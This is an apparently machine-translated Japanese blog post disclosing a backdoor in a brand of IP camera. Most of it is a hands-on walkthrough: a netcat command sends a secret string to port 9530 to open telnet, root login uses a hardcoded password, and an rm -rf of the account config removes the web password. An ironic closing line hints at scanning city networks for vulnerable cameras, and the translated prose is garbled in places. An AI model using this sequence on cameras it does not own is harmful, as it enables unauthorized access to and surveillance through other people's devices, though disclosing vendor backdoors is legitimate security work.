おとぎ話ある紳士の信頼できる鋳鉄製のドアにドゥリアードの組み合わせ用のロックが付いたものを購入しましたが、取り付け後にヒンジがきしみ始めました。 彼は専門家を呼んで、台所に座ってお茶を飲み、飲み物を飲み、インストーラーが突然彼のもとに来て、「
私は仕事を探しています。ループに油が塗られています。チェックしてください」と言います。 そして、主人は彼に尋ねました。「どうやってiron鉄の扉から入りましたか? マニュアルワーカーはこれに応答します:「あなたが私達にマスターマスターを愛するときにしきい値で待たないために、私達はあなたがドアの左上隅をたたくとき、ドアが開くように、専門家によって証明された専門家との秘密のボタンを作ることにしました」
ナンセンス、あなたは思う、それはおとぎ話でのみ起こり、あなたは根本的に間違っているでしょうこの投稿では、そのような開発者が存在することを説得力を持って、そして実例を用いて証明します。
どういうわけか、私は製造設備のユニークな品質で有名な国からIPカメラを入手しました。未知のパスワードで、グーグルは設定をリセットすることでこのパスワードをリセットするユーティリティに至りましたが、それに興味を持っています。
それが最初にカメラで発見されたものです。
ホストが稼働しています(0.0014秒の遅延)。
表示されていません:65529閉じたポート
ポートステートサービス
80 / TCPオープンHTTP
554 / tcp open rtsp
8899 / TCPオープンospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown
WEBはパスワードで保護されています。 CLI番号
tcpdumpを起動し、パスワードリセットユーティリティを起動します。
コマンド\ rOpenTelnet:OpenOnceがポート9530 tcpに送信されることがわかります。 その後、デバイスでtelnetが開かれ、プログラムはポート23に移動し、事前定義されたパスワードを使用して、パスワードに関する構成をリセットします。
手動ですべてを試してみましょう
1.カメラでtelnetを開きます
nc 192.168.1.10 9530
\ rOpenTelnet:OpenOnce
開いていることを確認してください
nmap -p 1-65535 192.168.1.10
ポートステートサービス
23 / TCPオープンtelnet
80 / TCPオープンHTTP
554 / tcp open rtsp
8899 / TCPオープンospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown
標準のパスワードの下に行きます
telnet 192.168.1.10
192.168.1.10を試す...
192.168.1.10に接続しました
エスケープ文字は「^]」です。
LocalHostログイン:root
パスワード:xmhdipc
Monitor Techへようこそ。
#rm -rf / mnt / mtd / Config / Account *
#再起動
#外部ホストによって接続が閉じられました。
再起動後、パスワードなしでウェブ経由でカメラにアクセスできます。 楽しんでください。
機器メーカーがそのような穴から出るときの指針は、個人的には明確ではありません。
読者の皆様、開いているポート9530で観察したい都市のネットワークを決してスキャンせず、上記のアクションを実行しないでください。これは、休暇や旅行に行きたいという欲求につながる可能性があります。